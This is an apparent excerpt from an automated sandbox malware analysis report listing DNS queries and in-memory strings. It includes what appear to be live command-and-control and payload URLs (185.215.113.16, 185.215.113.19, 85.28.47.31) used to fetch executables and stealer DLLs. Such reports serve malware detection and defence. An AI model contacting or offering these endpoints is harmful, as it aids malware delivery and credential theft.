Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comaccounts.google.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comaccounts.google.com/| equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comaccounts.google.comeD/ equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comeD/ equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comwww.youtube.com!) equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.comwww.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xe=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: mitmdetection.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: o.pki.goog
Source: global traffic DNS traffic detected: DNS query: pki-goog.l.google.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www3.l.google.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: r10.o.lencr.org
Source: global traffic DNS traffic detected: DNS query: r3.o.lencr.org
Source: global traffic DNS traffic detected: DNS query: getpocket.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: r11.o.lencr.org
Source: global traffic DNS traffic detected: DNS query: firefox-api-proxy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: tiles-cdn.prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: img-getpocket.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: img-prod.pocket.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: firefox-settings-attachments.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: attachments.prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.expedia.com
Source: global traffic DNS traffic detected: DNS query: www.amazon.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: d3ag4hukkh62yn.cloudfront.net
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: getpocket.com
Source: global traffic DNS traffic detected: DNS query: market-trk.com
Source: global traffic DNS traffic detected: DNS query: www.mozorg.moz.works
Source: global traffic DNS traffic detected: DNS query: www.romper.com
Source: global traffic DNS traffic detected: DNS query: www.wired.com
Source: global traffic DNS traffic detected: DNS query: www.themarshallproject.org
Source: global traffic DNS traffic detected: DNS query: ww55.affinity.net
Source: global traffic DNS traffic detected: DNS query: www.jezebel.com
Source: global traffic DNS traffic detected: DNS query: eat.hungryroot.com
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/15.113.16/
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/15.113.16/9
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.000000000076B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5=
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpG
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpK
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk=U
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedb
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedk
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx=$
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exe7
Source: file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exen
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe395d7f
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe=
Source: explorti.exe, 00000013.00000002.3285409912.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exeR
Source: axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ws
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/0003002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/03002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/15.113.19/0003002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/15.113.19/002
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/6122658-3693405117-2476756634-1003
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/G
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php003002
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0io
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1000003002F
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1000003002FK
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpEscape
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpI
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPhO
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPiO
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpart
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpcountPicturesg
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phph
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpq
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
Source: explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr(
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phps
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ferences.SourceAumide
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/lfons
Source: explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/rosoft
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, 48f0ec6733.exe, 00000015.00000002.2790891985.00000000026EE000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.000000000274A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.000000000274A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/#
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002765000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2461529806.0000000028D89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php(
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php)l
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.0000000002500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php1
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php=l
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpD
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpI
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpK
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpT
Source: file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpcpoa
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpf
Source: file.exe, 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllm$
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllH
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllA
Source: file.exe, 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/al
Source: file.exe, 00000000.00000002.2461529806.0000000028D89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/e
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/k
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/kl
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/yl8(
Source: file.exe, 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 48f0ec6733.exe, 00000015.00000002.2790891985.00000000026EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31I
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31gl&(
Source: 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31o
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/GSyT1N4PBrg.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163242946.0000016DE0769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
